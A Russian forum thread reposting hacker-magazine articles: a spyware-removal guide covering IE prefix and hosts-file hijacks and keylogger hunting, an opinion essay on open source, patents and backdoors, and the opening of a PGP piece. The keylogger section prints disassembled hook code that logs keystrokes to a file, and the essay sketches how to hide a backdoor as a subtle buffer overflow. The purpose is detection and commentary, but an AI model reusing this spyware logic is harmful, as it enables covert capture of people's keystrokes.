2. Многие SpyWare проверяют наличие своих ключей (CLSID, регистрация BHO) по таймеру, следовательно, удаление ключей, соответствующих шпионскому BHO, помогает, но на пару секунд. Такой SpyWare ловится аналогично - при помощи RegMon и установки прав доступа к ключам реестра.Кроме того, в любом случае перед удалением BHO следует закрыть все окна IE и проследить, чтобы в памяти не осталось процессов iexplore.exe - существуют "звери", которые смещают окно IE за пределы экрана или делают его невидимым.

Настройки Internet Explorer

Еще одной опасной операцией, которую проделывают некоторые SpyWare и трояны, является перенастройка параметров безопасности IE. После чистки компьютера и убийства "зверей" в любом случае необходимо внимательно все проверить, так как часто ситуация кажется нормальной лишь на первый взгляд, а изменен всего один параметр, например включена установка ActiveX без запроса. Кроме того, однозначно нужно проверить список доверенных сайтов, там тоже можно обнаружить интересные записи типа xxxtoolbar.com.

Следующим шагом проверки настроек Explorer является проверка ключика реестра SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes. Этот ключ - один из самых "любимых" у разнообразных SpyWare и порноскопов. В нем задается настройка, позволяющая IE определять протокол по начальным символам URL. Например, параметр с именем www и значением http:// означает, что если введенный URL начинается с www, то перед ним нужно поставить префикс протокола http://>gt; . Следовательно, создание параметра gt; со значением http://некий сайт/?user_url=>gt; приведет к тому, что все URL, начинающиеся с gt; , будут дополняться указанной строчкой. Это очень старый и избитый, но до сих пор актуальный трюк. Из этого сделаем вывод, что все имеющиеся в ключе Prefixes параметры нужно проверить, желательно экспортировать ключ и поставить на него права доступа "только чтение".

Еще одной "шуточкой" со стороны SpyWare может быть использование списка "Избранное". У IE есть функция, благодаря которой вводимый в строке URL текст сначала сравнивается с именами ссылок списка "Избранное", причем сравнение ведется тупо, без всякого анализа. Соответственно, если в "Избранное" создать ссылку с именем www.google.com и затем ввести такой URL, то подстановка сработает.

Файл HOSTS

Правка файла hosts является одной из любимых задач разнообразных SpyWare. По простой идее этой методики в файл hosts вносятся строки типа xx.xx.xx.xx www.google.com, что приводит к переадресации обращения к сайту www.google.com на IP xx.xx.xx.xx. Это делается в целях накрутки посещаемости сайтов, обмана (сайт-подделка может выглядеть в точности как настоящий), блокировки обновления Windows, антивирусов и антиспайверов. Все это дело лечится обычной чисткой файла HOSTS вручную, а позднее установкой атрибутов для него "только чтение".

Поиск клавиатурных шпионов

Клавиатурный шпион можно искать в системе тремя способами: вручную, антивирусом или при помощи специализированных программ. Однако антивирус малоэффективен против кейлоггера, потому что устройство кейлоггера элементарно и можно написать разновидность, которую не будет детектировать ни один из антивирусов. (В этом номере есть небольшой примерчик, его легко скомпилировать и проверить на том же www.virustotal.com. Я специально пробовал - результат нулевой, ни один из 22-х антивирусов даже не пискнул.)Из спецпрограмм стоит отметить PrivacyKeyboard и Anti-keylogger, которые перехватывают кучу системных функций и отлавливают типичное для кейлоггера поведение. Они хорошо ловят кейлоггеры всех видов, но ставить отдельный продукт для поимки клавиатурного шпиона - это на любителя.

Конечно, настоящий Х-мэн в состоянии обойтись и без спецпрограмм, так как большинство кейлоггеров построено на основе ловушек, а ловушки предполагают загрузку библиотеки-перехватчика во все GUI-процессы, что и выдает такие кейлоггеры с головой. Как раз во время написания этой статьи мне прислали файл для анализа - оказалось, Family Key Logger:

5. Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)

C:\WINDOWS\system32\CTF\ctfs.dll -->gt; Подозрение на Keylogger или троянскую DLL

C:\WINDOWS\system32\CTF\ctfs.dll>gt; >gt; >gt; Нейросеть: файл с вероятностью 99,92% похож на типовой перехватчик событий клавиатуры/мыши

>gt; >gt; >gt; C:\WINDOWS\system32\CTF\ctfmon.dll -->gt; С высокой степенью вероятности обнаружен Keylogger или троянская DLL

C:\WINDOWS\system32\CTF\ctfmon.dll>gt; >gt; >gt; Нейросеть: файл с вероятностью 99,98% похож на типовой перехватчик событий клавиатуры/мыши

Как видно из протокола, кейлоггер поймался на мелочи - его демаскировали DLL, в которых, собственно, и размещены хуки. Далее самое сложное – отличить кейлоггер от некой безобидной DLL, предназначенной для отлова горячих клавиш, что осуществляется с помощью IDA, причем препарирование сводится к поиску кода Hook'а и анализа того, какие функции он выполняет.

Наш подопытный экспортирует функцию, инсталлирующую Hook:

листинг

IDA - фрагмент кода, устанавливающего Hook кейлоггера

Верстальщику: строки .text:1000151A:. и .text:1000151 :. выделить цветом или жирным шрифтом

.text:1000150A InstallKeyboardHook proc near

.text:1000150A push ebp

.text:1000150B mov ebp, esp

.text:1000150D push 0 ; dwThreadId

.text:1000150F mov eax, hmod

.text:10001514 push eax ; hmod

.text:10001515 push offset KeyboardProc ; lpfn

.text:1000151A push 2 ; idHook

.text:1000151C call ds:SetWindowsHookExA

.text:10001522 mov ds:hhk, eax

.text:10001527 mov eax, ds:hhk

.text:1000152C pop ebp

.text:1000152D retn

.text:1000152D InstallKeyboardHook endp

В данном коде для нас интересны параметры функции SetWindowsHookExA. Параметр idHook задает тип перехватчика (в нашем случае он "2", то есть клавиатура, что наводит на соответствующие подозрения), offset KeyboardProc - смещение функции-обработчика. Посмотрим, что делает этот самый KeyboardProc (листинг урезан: в настоящем звере несколько веток, а я оставил короткий и наглядный фрагмент; более сложный обработчик отличается только тем, что фиксирует имя пользователя и имя окна в фокусе ввода - все остальное остается неизменным).IDA - фрагмент кода кейлоггера

::::.

.text:1000108A lea edx, [ebp+SystemTime]

.text:10001090 push edx ; lpSystemTime

.text:10001091 call ds:GetLocalTime

.text:10001097 cmp [ebp+uScanCode], 80000000h

.text:1000109E jb loc_1000117F

.text:100010A4 cmp dword_10003230, 0

.text:100010AB jz loc_10001161

.text:100010B1 mov dword_10003230, 0

.text:100010BB lea eax, [ebp+KeyState]

.text:100010C1 push eax ; lpKeyState

.text:100010C2 call ds:GetKeyboardState

.text:100010C8 push 0 ; uFlags

.text:100010CA lea ecx, [ebp+Buffer]

.text:100010D0 push ecx ; lpChar

.text:100010D1 lea edx, [ebp+KeyState]

.text:100010D7 push edx ; lpKeyState

.text:100010D8 mov eax, [ebp+uScanCode]

.text:100010DB push eax ; uScanCode

.text:100010DC mov ecx, [ebp+uCode]

.text:100010DF and ecx, 0FFFFh

.text:100010E5 push ecx ; uVirtKey

.text:100010E6 call ds:ToAscii

.text:100010EC mov byte ptr [ebp+Buffer+1], 0

.text:100010F3 push 0 ; hTemplateFile

.text:100010F5 push 80h ; dwFlagsAndAttributes

.text:100010FA push 4 ; dwCreationDisposition

.text:100010FC push 0 ; lpSecurityAttributes

.text:100010FE push 3 ; dwShareMode

.text:10001100 push 40000000h ; dwDesiredAccess

.text:10001105 push offset String1 ; "c:\\log.txt"

.text:1000110A call ds:CreateFileA

.text:10001110 mov [ebp+hObject], eax

.text:10001116 push 2 ; dwMoveMethod

.text:10001118 push 0 ; lpDistanceToMoveHigh

.text:1000111A push 0 ; lDistanceToMove

.text:1000111C mov edx, [ebp+hObject]

.text:10001122 push edx ; hFile

.text:10001123 call ds:SetFilePointer

.text:10001129 push 0 ; lpOverlapped

.text:1000112B lea eax, [ebp+NumberOfBytesWritten]

.text:10001131 push eax ; lpNumberOfBytesWritten

.text:10001132 lea ecx, [ebp+Buffer]

.text:10001138 push ecx ; lpString

.text:10001139 call ds:lstrlenA

.text:1000113F push eax ; nNumberOfBytesToWrite

.text:10001140 lea edx, [ebp+Buffer]

.text:10001146 push edx ; lpBuffer

.text:10001147 mov eax, [ebp+hObject]

.text:1000114D push eax ; hFile

.text:1000114E call ds:WriteFile

.text:10001154 mov ecx, [ebp+hObject]

.text:1000115A push ecx ; hObject

.text:1000115B call ds:CloseHandle

:.

Как легко видеть, собственно весь кейлоггер вписался в 55 команд ассемблера. Этот код получает текущее время и состояние клавиатуры, затем дозаписывает информацию в хвост файла c:\log.txt.

По статистике, в DLL кейлоггера часто встречаются функции SetWindowsHookEx и CallNextHookEx, ToAscii, GetKeyboardState, MapVirtualKeyA, GetForegroundWindow. Поймать и проанализировать такую DLL можно вручную и без особых проблем. Изловить кейлоггер на основе драйвера или циклического опроса клавиатуры сложнее. Однако посторонний драйвер достаточно заметен, а отловить опрос клавиатуры в цикле тоже нетрудно – запрос должен идти с высокой скоростью.Ссылки

ТИП: WWW

www.europe.f-secure.com/exclude/blacklight/ - утилита для поиска руткитов BlackLite от F-Secure.

www.sysinternals.com/Utilities/RootkitRevealer.html - утилита для поиска руткитов Rootkit Revealer от SysInternals. На www.sysinternals.com есть еще множество полезных утилит, например FileMon, RegMon, Autoruns.

http://z-oleg.com/secur/avz.htm - утилита AVZ.

www.tomcoyote.org/hjt - утилита HijackThis.

http://virusscan.jotti.org - проверка файла несколькими антивирусами.

www.virustotal.com/ - проверка файла несколькими антивирусами.

Автор:  Ангел [ 26-03, 01:06 ]
Заголовок сообщения: 

Общественность встречает открытые исходники с большим энтузиазмом, словно глоток свежего воздуха. Open Source активно продвигаются и позиционируются как идеальное средство от всех проблем. Насколько это так?..

О тайнах и секретах

Существует понятие "тайны", например государственной или коммерческой. Это вполне нормальное явление (особенно в информационную эпоху). Античные мастера обладали множеством продвинутых технологий, передававшихся из поколения в поколение или умиравших вместе со своим обладателем. Многие секреты оказались безвозвратно утеряны во времени. С развитием индустрии такой путь "производства" оказался весьма проблематичным, и потому государство предложило концепцию патента.

Что же такое патент? Патент - это добровольное разглашение тайны в обмен на охрану исключительных прав использования данной технологии. В практическом плане это означает, что описание любой запатентованной технологии (а на Западе сейчас патентуется каждая мелочь) можно свободно (притом бесплатно) найти на сайте Patent Full-Text and Full-Page Image Databases (www.uspto.gov/patft/index.html). Часто это единственная информация, доступная по современным технологиям (по устройству тех же жестких дисков, например).

Патенты стимулируют систему образования и полезны во всех отношениях, за исключением полной несвободы их использования. Да, мы можем узнать, как устроен транслятор адресов винчестеров типа Maxtor (очень полезно для их восстановления), но не можем выпускать ничего подобного самостоятельно. Обладатель патента вправе решать, выдавать кому-либо лицензию или нет. Сначала патенты выдавались на вполне конкретные изобретения, которые могли использоваться в производстве. Например, на хитроумную конструкцию часов с самозаводящимся механизмом. Изучив чужой патент, остальные пытались усовершенствовать его, разработав совсем другую конструкцию, чтобы выпускать ее без всяких отчислений, что было вполне логично. Но в последнее время наметилась неприятная тенденция к патентованию фундаментальных основ, на которых держится пуп мироздания. Несмотря на то, что информация по-прежнему остается открытой, она уже не может быть использована посторонними.

Следовательно, программисты не могут писать программы, не опасаясь судебного преследования. Сегодня куда ни плюнь, обязательно попадешь во что-то запатентованное. Написать программу сложнее Hello, world!, не нарушив при этом пары десятков патентов, невозможно! Точнее, возможно, но только тихо, без лишнего шума. Пока мы не будем никому мешать, нас никто не тронет. Скорее всего, никто не тронет. Куча прецедентов - яркое подтверждение тому.

Со временем ситуация только ухудшится. Затем, когда она дойдет до логического абсурда, угробив три четверти индустрии, случится что-то радикальное. Такое, что изменит все. Но до этого еще далеко. На сегодняшний день от патентов страдают все. Компании, вкладывающие миллиарды долларов в разработку перспективных исследований, каждый раз рискуют потерять все, потому что конкурент может добежать до финиша на день раньше и сорвать банк. Мелкие компании находятся в еще более проигрышном положении. Во-первых, они вынуждены лицензировать кучу технологий, которые могли бы разработать и самостоятельно, но, увы, нельзя, так как на них и всю прилагающую к ним смежную область уже выданы патенты! Во-вторых, запатентовав что-то свое, мелкая компания вынуждена сидеть и ждать у моря погоды, пока пираты заплатят хоть что-то (а регистрация патента стоит немалых денег, плюс необходимо платить постоянные отчисления за его "защиту"). В общем, мрак.
У патентов и Open Source много общего. И в том, и в другом случае информация хранится в открытом виде, доступном (для ознакомления) всем желающим. А на ее использование наложены достаточно жесткие ограничения. Open Source - это отнюдь не свобода! Это сплошные ограничения, и настала пора познакомиться с ними поближе.

Несвободное Open Source

Начнем с тривиальных истин и определений. Программой называется последовательность инструкций для управления процессором. Не стоит путать ее с программным продуктом, представляющим собой совокупность программы, документации, упаковки, технической поддержки и т.д. Другими словами, программа - это лишь набор байт, а программный продукт - услуга.

По нашим (и не только нашим) законам, программа является объектом авторского права, поэтому на ее использование наложены определенные ограничения, возникающие в силу объективных психических расстройств в голове у законников. К слову сказать, авторское право уже распространяется даже на картриджи к принтерам, так что удивляться ничему не приходится. Власть попала в руки медиамагнатам и софтверным гигантам, проталкивающим свои законы и занимающим первые строчки хит-парада самых богатых людей планеты, отправив в отстой нефтяных магнатов. По логике, законы должны служить на благо подавляющего большинства, а не жалкой кучки "имущих", но имущие имеют нас, при этом показывают рекламу, убеждая, что все идет верным путем и вообще забота о состоянии Била Гейтса - твой гражданский долг.

Кстати, половина опрошенных музыкантов/авторов равнодушно относится к тому, что их произведение можно стянуть в Сети, другая половина даже благословляет это, поскольку свободное копирование увеличивает их известность. И лишь жалкие несколько процентов вроде Войновича вопят, что интернет - это палач писателя. Если писатель пишет только ради личного обогащения, то читать там, скорее всего, нечего. Продукт брожения, продукт перегонки, творческий продукт... Американский книжный рынок (да и рынок медиапродукции) переживает не лучшие дни. Книги практически не продаются. Все потому, что народ не хочет покупать по-старому, а "маркетоиды" не умеют/не хотят торговать по-новому. Издатель (в случае музыкантов "лейб") покупает права на произведение и кладет его под сукно. Похоже на собаку на сене: сам не продаю, не раскручиваю, но и другим не даю. Как следствие, все больше и больше творческих людей посылают авторское право и свободно выкладывают себя в Сеть, что приносит намного больший доход (не говоря уже о глубоком моральном удовлетворении), чем обращение к издателям, которые есть крысы по определению.Программное обеспечение еще находится в той стадии, когда все понимают, что авторское право несет только вред, но до сих пор никто реально не готов отказаться от него. Даже сторонники Open Source. Фактически, с точки зрения авторского права нет совершенно никакой разницы, в каком виде распространяется программа - в виде двоичного файла или исходного текста. В любом случае оно обеспечивает охрану, что является очень большой ошибкой законников. Вот если бы авторское право защищало только исходные тексты, большинство программ распространялись бы именно так, а общество от этого только выиграло.

Итак, программа - объект авторского права, и ее распространение полностью регулируется правообладателем (во всяком случае, в теории все обстоит именно так). Нормальные авторы выпускают произведения в свет, позволяя им жить собственной жизнью, но таких очень немного. Подавляющее большинство хочет все, причем сразу. Движение Open Source не стало исключением.

Что такое свобода? Допустим, я создаю программу и выкладываю ее в интернет со словами "пусть каждый использует мое творение так, как считает нужным, вознаграждение и сохранение строки с указанием автора необязательны". Вот это действительно свобода, при которой автор программы не имеет никаких преимуществ перед всеми остальными. Open Source проповедует совсем другую идеологию. Лицензия GPL, под которой распространяется подавляющее большинство открытых продуктов, разрешает использовать компоненты программы в своих продуктах, но при этом требует, чтобы они распространялись по все той же лицензии GPL! А это значит, что всем пользователям необходимо передать безвозмездное право на модификацию и дальнейшее распространение программы плюс предоставить доступ к исходным текстам. Это логично. Если я не сплю ночами и под бурчание возмущенного желудка пишу свободно распространяемую программу, за которую не требую вознаграждения, скромно прося милостыню подаяния (или, по-английски, donate), то, разумеется, я не хочу, чтобы какой-то там Билл включил мое творение в свою голимую Windows и делал на язве моего желудка money. Но в мире существуют не только Гейтсы. Для большинства программистов лицензия GPL равносильна приговору, и они с гораздо большей охотой приобретают коммерческие "несвободные" компоненты, поскольку они более "свободы"!

Соблазнившись лицензией GPL и написав какой-нибудь продукт для себя, программист становится заложником "свободного" Open Source и вынужден распространять его на "свободных" основаниях. Формально GPL не запрещает продавать программу, но при этом накладывает столько ограничений, что делает успешный бизнес практически невозможным. Для обхода/освобождения от GPL разработчик вынужден переписывать тучу кода, поэтому GPL-лицензию еще называют GPL-вирусом - заражает все, к чему прикоснется.

Оставив нравственно-политический подтекст в стороне, попробуем ответить на вопрос, что же такое свобода. Open Source образует свое сообщество (community), а любое сообщество - это уже несвобода. Вступая в любое (со)общество, ты поступаешься частью своих прав и свобод в обмен на гарантию защиты оставшихся. Лицензия GPL защищает разработчиков, препятствуя использованию продуктов их труда на традиционной коммерческой основе. Этим GPL создает принципиально иную нишу рынка, успешно конкурирующую даже с такими монстрами, как Microsoft и IBM. Использование программ, распространяемых по лицензии GPL, как бы втягивает разработчика внутрь сообщества, после чего он уже вынужден работать на его благо. Конечно, имеются и другие лицензии, более демократичные, например лицензия BSD, требующая всего лишь обеспечить открытость кода, но не обязывающая передавать пользователям все права. Однако они не получили широкого распространения.Подытожим. С точки зрения конечных пользователей, GPL - это действительно свобода. Можно бесплатно скачивать продукты из Сети, дорабатывать их по своему усмотрению, записывать на CD-R и продавать по всему периметру сети магазинов, потому что GPL не препятствует продажам! Главное - чтобы были исходные коды плюс право их дальнейшей модификации. Но программисты не видят никакой свободы в GPL. Если это и свобода, то только внутри сообщества, "свобода" только для избранных, вроде нашего коммунизма.

Закрытая открытость Open Source

Какие мотивы могут побудить создателя программы к распространению исходных текстов? Какие мотивы могут воспрепятствовать этому? Решение о "закрытости" или "открытости", как правило, принимается на бессознательном уровне. Логика здесь отдыхает.

Часто приходится слышать, что исходные тексты содержат корпоративные секреты, которые ни в коем случае нельзя разглашать, иначе компания просто рухнет. Что за ерунда?! Как уже говорилось выше, в современном мире секреты уступили место патентам. Если некоторая фирма создала действительно революционный продукт (например безупречный распознаватель речи) и выбросила его на рынок, конкуренты тут же дизассемблируют машинный код и восстановят алгоритм. Помешать им может только патент, а патент требует раскрытия секретности. В России и Европе, правда, алгоритмы еще не патентуются. Точнее, как бы не патентуются, но это ограничение легко обойти, например описав абстрактное устройство с процессором, выполняющее такие-то и такие-то действия. Устройство уже можно патентовать. И патентуют, причем в промышленных масштабах.

Еще существует мнение, по которому наличие исходных текстов позволит создать аналогичный (или даже сильно улучшенный) продукт на основе существующего. Отчасти это действительно верно, однако только отчасти. Взгляни на Open Source. Исходные тексты доступны, но... продукты не плодятся, как кролики. То есть плодятся, конечно, но побочные ветви быстро сдыхают. Никому и в голову не придет что-то там дорабатывать: не сегодня-завтра придут судебные исполнители и зарубят проект к чертовой матери. Лучше быстро выпустить "пиратку" по демпинговой цене и уползти с наваром. Для этого даже не нужно иметь исходные тексты.Единственная объективная причина - это кривизна исходников, демонстрирующая тупость их создателей, умышленно оставленные закладки и ворованные компоненты плюс стадный инстинкт. Если никто не показывает исходных текстов, то и мы не будем делать это. Особенно умиляют начинающие программисты, объявляющие, что их продукт "запатентован", а исходные тексты покрыты мраком тайны. На самом деле исходные тексты недоступны потому, что программисты боятся показать их народу :). Глупо. Если коллеги укажут тебе на ошибку, то ты сможешь выявить ее и исправить, ликвидировав еще один пробел в своих знаниях. Чтобы научиться писать хорошие и конкурентоспособные программы, необходимо не раз ткнуться носом в собственное дерьмо. Более чистых путей, увы, не бывает.

Если исходные тексты не открывают, их воруют. За примерами ходить далеко не нужно. Только ленивый не найдет в Сети сырцы MS-DOS 6.x и W2K. Ну и что? Какой от этого ущерб? Аналогичных продуктов на основе уже существующих так и не появилось, корявость рук программистов, конечно, стала видна (нашли даже несколько новых дыр), но о том, что в Microsoft умных людей практически не осталось, и так все знают (достаточно взглянуть на Longhorn, beta-версия которого занимает ~450 Мб памяти). Так что ровным счетом никакого ущерба, а сплошной PR. Программистам же это помогло лучше понять некоторые туманные места в документации. Теоретически, Microsoft должна быть заинтересована в том, чтобы привлечь как можно больше разработчиков на свою платформу.

А вот другой случай. Несколько лет назад были украдены исходные тексты CISCO IOS. Какой разразился скандал! Руководитель компании драл ремнём в поисках похитителя, вылив на него столько грязи, сколько не увидишь даже в российском придорожном туалете. А IOS представляет собой смесь Linux'а и BSD. Из "своего", "родного" там только драйверы и кое-что еще. Для этого, кстати говоря, даже не нужно заглядывать в исходные тексты. Как и любой цельнодернутый продукт, CISCO наследует все дыры своего "донора". Так что здесь все просто: вор у вора лошадку увел. Какой смысл закрывать исходные тексты, если они и так доступны? Их даже воровать не нужно! Стек протоколов, во всяком случае, уж точно писан не CISCO! Но это не мешает компании выпускать самые популярные роутеры, потому что роутер - это не исходный текст, а железка. Наличие/отсутствие исходных текстов операционной системы никак не влияет на объем продаж. И это не единичный пример...

Безопасность Open Source

Теперь разоблачим миф, связанный с безопасностью: якобы, имея на руках исходные тексты, можно обнаружить любые баги и закладки. Или, говоря научным языком, провести аудит. А ничего подобного! Типичная современная программа представляет собой миллионы строк, сложным образом взаимодействующих с "окружающим миром" и друг с другом. Несомненно, исходные тексты упрощают анализ, но не до такой степени, чтобы радикально все изменить. Чтобы разобраться, что в каком файле находится и за что отвечает, необходимо угробить кучу времени.В команде Open Source или в коммерческой фирме существует жесткое разделение. Каждый ведет свою часть проекта и в чужие суется либо от нечего делать (и за это ему дают по рукам), либо на стыке взаимодействия своей части проекта с остальными. За это ему тоже дают по рукам или ругаются матом. Об этом хорошо сказал Евгений Зуев в статье "Редкая Профессия": "Возникало тяжелое ощущение того, что это большая темная комната, а у тебя только маломощный фонарик, который в состоянии осветить небольшой аппарат - твои модули. От аппарата тянутся в темноту провода и вереницы зубчатых колес. Что делается в дальних углах, неизвестно. Иногда вокруг раздаются какие-то звуки, из темноты выступают части каких-то движущихся механизмов, назначение которых остается неведомым, даже если осветить их. Время от времени из темноты раздается голос, настоятельно требующий нажать на кнопку с надписью ABC, перевести рычаг XYZ в правое положение... Что делается в комнате и как все работает вместе, понять совершенно невозможно".

В команде разработчиков обязательно имеется несколько человек, своеобразных "носителей знания", которые держат в голове максимум подробностей структуры кода и координируют работу остальных "субносителей", окучивающих каждую команду. Все это сделано для того, чтобы обезопасить проект от воли отдельных разработчиков. Если партийный функционер команды покидает ряды компании или погибает, его место занимает другой, которому в черепную коробку "вливают" все старые знания. В больших фирмах существует развитая инфраструктура документооборота, в Open Source – списки рассылки. Процесс вживления в команду протекает долго и практически всегда очень болезненно.

Сами по себе исходные тексты любой серьезной системы (например компилятора gcc или ядра Linux) полностью лишены смысла. Это только груда файлов, которую удастся откомпилировать, если повезет, с N-ой попытки. Без соответствующей поддержки разобраться в них практически невозможно. Возьмем тот же gcc. Допустим, тебе необходимо добавить в него поддержку новой фичи или исправить ошибку кодогенератора. Поклонники Open Source говорят, что в случае с Microsoft Visual C++ твое дело - труба. Все, что ты можешь, - бомбардировать Microsoft факсами и умолять о пощаде. А вот в gcc просто взял и добавил. Как же! Тебе тут программировать нужно, а не ковыряться в исходном коде gcc. За то время, пока ты будешь разбираться с ним, можно сто раз найти обходное решение проблемы или дождаться очередного фикса от Microsoft! Так что чем крупнее проект, тем меньшую пользу можно извлечь из исходных текстов. К тому же, куда тебе девать свои изменения при переходе на новую версию? С большой степенью вероятности перенести их будет очень непросто и потребуется угробить еще одну кучу времени. И так каждый раз. Интерфейс плагинов в этом смысле более привлекателен. Сторонним разработчикам предоставляется более или менее документированный и унифицированный API, дающий им возможность создавать собственные расширения. Заглядывать в исходные тексты при этом не требуется. К тому же снимается проблема переноса расширений во все остальные версии.Энтузиасты Open Source

Еще один миф - о тысячах энтузиастов по всему миру. Это чистейшей воды брехня. Нет ни одного продукта, созданного толпой. Всегда во главе стоят один-два толковых парня, а остальные ходят с понтом "мы пахали". Вот, например, DOS Navigator от RIT Labs. Отличный продукт, с нехилым количеством пользователей и фанатов. После того как фирма свернула свои работы и выложила его исходники в Сеть, проект сдулся. Да, сейчас существует NDN и еще несколько "отпрысков", но все они находятся в сильно заболоченном состоянии. Конечно, можно привести и контрпример. Скажем, Лис (он же FireFox), который развивается настолько бурно, что даже теснит IE (а потеснить IE - это не мыло по тазику гонять). Но как же он тормозит! Вся программа в одном исполняемом файле. Так умные люди не пишут, поэтому рая на земле не бывает...

Backdoor'ы в Open Source

Что там у нас еще? Ах да, backdoor. Дескать, в Open Source их не внедришь. Как бы не так! Обнаружить хорошо продуманную закладку практически невозможно. Достаточно "случайно" допустить ошибку переполнения буфера, проявляющуюся только при стечении множества маловероятных обстоятельствах на стыке разных модулей. Например, такой сценарий: один модуль делает удар по памяти, искажая данные другого так, что буфер переполняется на строках в 69 символов, но не переполняется при всех остальных (срабатывают дополнительные проверки). Чтобы обнаружить эту ошибку, необходимо удержать в голове работу двух разных модулей, связав их воедино, что не намного легче, чем дизассемблировать машинный код. А переполнение буфера - это уже shell. Со всеми вытекающими...

Занавес

Очень нравятся открытые исходные тексты и ненавистно несвободное программное обеспечение, которое запрещается модифицировать или дизассемблировать. Из двух свобод ("свободы социалистического лагеря" и "свободы одноименной статуи") мы выбираем первую. Ненавидим корпоративные секреты и прочую ахинею. Под Windows вообще нельзя программировать! Достаточно вспомнить разбирательство между Microsoft и Stacker. Фирма Stacker написала свой компрессор, а Microsoft его спионерила. Обиженная Stacker подала в суд и выиграло дело, но Microsoft выдвинула встречный иск. Дескать, Stacker увела у нее... протокол загрузки MS-DOS! Обе компании разошлись "полюбовно". Никто никому ничего не должен.

Приобретая диск с лицензионной Windows, многие не приобретают носитель, поскольку на нем находятся логотипы Microsoft и прочая X, а на его использование наложено множество ограничений. Что же касается самого программного обеспечения, то лицензия делает его использование практически невозможным (речь идет в первую очередь о написании программ). Тем не менее, Windows (и большинство коммерческого программного обеспечения) как бы работает. Производители действительно прилагают колоссальные усилия, чтобы ты остался довольным и не вернул диск в магазин.Linux и большинство остальных проектов Open Source работают только с бубном и только рядом с тем, кто это лабал. Только не надо кричать о кривых руках и нести прочий бред. Качество кода в том же Linux в несколько раз ниже, чем в Windows, и прежде чем получить внятную возможность начать работу с ним, придется долго двигать напильник, дорабатывая его под свои нужды. Зато потом... будет кайф и ништяк.

В российских условиях не соблюдающихся законов закрытое программное обеспечение оказывается в значительном выигрыше, поскольку его покупают (то есть пионерят), а не лицензируют. Один и тот же диск ставят на столько машин, на сколько возможно. Дизассемблируют машинный код, вносят в него любые мыслимые и немыслимые изменения. В общем, делают, что хотят. Open Source все еще остается в загоне. Действительно, зачем ездить на Запорожце, когда за эту же сумму можно приобрести "Мерседес"?!

Неверно думать, что нарушение лицензии идет нам на пользу, а Microsoft - не в убыток. Народ освоил Windows и Word, программисты создали целую инфраструктуру. Теперь, когда в Microsoft "спохватились" и "вспомнили" про пиратство, что-то менять стало поздно. Намного дешевле купить лицензионную ось, чем переносить все на Linux. Но! Чем жестче будет политика лицензирования, тем более привлекательным окажется Linux. Увидев Windows Longhorn, многие твердо решили для себя, что Windows 2000 станет последней осью из семейства оконных. Далее будет либо BSD, либо Linux. У этих систем есть будущее. У программистов, сидящих под Windows, будущего нет. Программы, написанные для Linux'а, создаются так же, как и тридцать лет назад. А под Windows постоянно приходится осваивать кучу никому не нужных технологий, меняющихся с каждым днем. Сейчас это легко, но через десять-двадцать лет смертельно надоест и захочется совершенствоваться в чем-то одном, а не чувствовать себя постоянно начинающим...

Компьютер состоит из программного и аппаратного обеспечения, граница между ними настолько условна, что вряд ли кто-то рискнет провести ее. Некоторые из компонентов современного ПК сами по себе - "компьютер". Например, жесткий диск. В нем есть сигнальный процессор и управляющий микроконтроллер, работающий под управлением специализированной операционной системы и несущий на своем борту COM-порт для передачи технологических команд. При желании на него можно заливать собственные программы, выполняющие некоторые математические расчеты и возвращающие результат. Такие "компьютеры" даже можно объединить в сеть, собрав мини-кластер.

Прошивки винчестеров - это программы, доступные для дизассемблирования, модификации и изучения. При всем нежелании производителей разглашать анатомические подробности своих девайсов, все же не приходится жаловаться на абсолютную закрытость информации.

Некоторые микроконтроллеры имеют внутреннее ПЗУ, защищенное от дампа, и прочитать его можно только на специальном (и притом весьма дорогостоящем) оборудовании, да и то не всегда. Большинство производителей так или иначе распространяет прошивку в том или ином виде, значит, ее можно скачать и хакнуть. Даже если распространяются лишь обновленные фрагменты, в которых нет ничего интересного, можно внедрить "свою" подпрограмму, которая, попав на микроконтроллер, считает всю прошивку и "сдампит" ее. Даже такое экзотическое программное обеспечение нельзя считать полностью закрытым. Что тогда говорить об обыкновенном софте? Отсутствие исходников еще никогда и никого не останавливало. Если нужно узнать, как работает программа, берешь в руки дизассемблер и вперед.Программа - объект авторского права. Во всяком случае, в теории так.

Использовал компоненты программы с лицензией GPL - распространяй свой результат по тем же правилам.

При всей своей логичности для большинства программистов лицензия GPL равносильна приговору.

GPL-лицензию также называют GPL-вирусом, который заражает все, к чему прикоснется.

При всей открытости досконально разобраться в программе, представляющую собой миллионы строк, практически невозможно.

Хотя писать программы пытаются тысячи энтузиастов, что-то стоящее создают единицы.

Backdoor'ы в Open Source возможны, как и в любой другой программе. Порой обнаружить их очень сложно.

Автор:  Ангел [ 26-03, 01:10 ]
Заголовок сообщения: 

Есть ли троян в PGP

Мифы и реальность

Существует много мнений о программе PGP и шифровании с ее помощью. Вплоть до такого, согласно которому внутри PGP есть встроенный троян. Мы разобрались и отделили реальность от мифов.

Реальность

PGP расшифровывается как Pretty Good Privacy – "неплохая секретность". На данный момент это серьезный современный криптографический пакет для обеспечения секретности твоей информации. PGP была разработана американским математиком Филиппом Цимерманом из Массачусетского университета - он выпустил первую версию PGP в 1991 году.

Для чего же предназначена программа PGP и чем она может быть полезна тебе? Основным назначением PGP изначально и до сих пор являлось шифрование электронной почты. Не секрет, что электронная почта попадает в ящик получателя не напрямую: для того чтобы письмо дошло до ящика получателя, оно должно пройти через провайдера, далее через несколько других вспомогательных серверов, и только после этого письмо попадает на почтовый сервер получателя. Для наглядности приведем скриншот "пути" от нашего компьютера до smtp.mail.ru. Ты также можешь посмотреть путь от тебя до smtp.mail.ru, введя в командной строке "tracert smtp.mail.ru".

Таким образом, данные (а именно письма, которые ты отправляешь) проходят около десятка серверов, прежде чем дойти до целевого. Никто не мешает владельцам этих серверов кешировать проходящий трафик, просматривать его и читать твои письма. Необязательно в лице бородатого любопытного админа. Вполне возможна такая ситуация, при которой на одном из крупных серверов по просьбе спецслужб установлены фильтры, фильтры отлавливают определенные ключевые фразы в проходящем трафике и создают отчеты по подозрительному содержанию, отчеты потом сохраняются в архивах спецслужб. И кто знает, для чего они могут быть применены впоследствии. Виной всему то, что письма идут в совершенно незашифрованном виде - в виде открытого текста. Так что использование PGP для шифрования электронной почты и стало актуально для людей, заботящихся о конфиденциальности своей информации.

